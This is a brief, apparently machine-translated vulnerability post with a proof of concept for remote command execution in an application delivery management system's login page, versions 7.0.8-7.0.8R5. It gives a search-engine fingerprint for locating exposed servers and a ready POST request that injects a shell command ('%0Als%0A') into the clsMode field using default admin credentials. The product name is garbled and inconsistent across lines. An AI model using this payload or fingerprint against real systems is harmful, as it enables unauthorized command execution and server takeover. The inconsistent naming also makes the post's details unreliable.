Deepin Service Application Delivery Management System Login Remote Command Execution Vulnerability
Deepin Service Application Delivery Management System Login Remote Command Execution Vulnerability
#Shenxinshui Application Delivery Management System login remote command execution vulnerability
Vulnerability Description
Deepin Service Application Delivery Management System login has a remote command execution vulnerability. The attacker can obtain server permissions and execute any commands through the vulnerability.
Vulnerability Impact
Shenxinshui Application Delivery Management System 7.0.8-7.0.8R5
Network surveying and mapping
fid=”iaytNA57019/kADk8Nev7g==”
Vulnerability reappears
Login page
Verify POC
POST /rep/login
clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
This post is licensed under CC BY 4.0 by the author.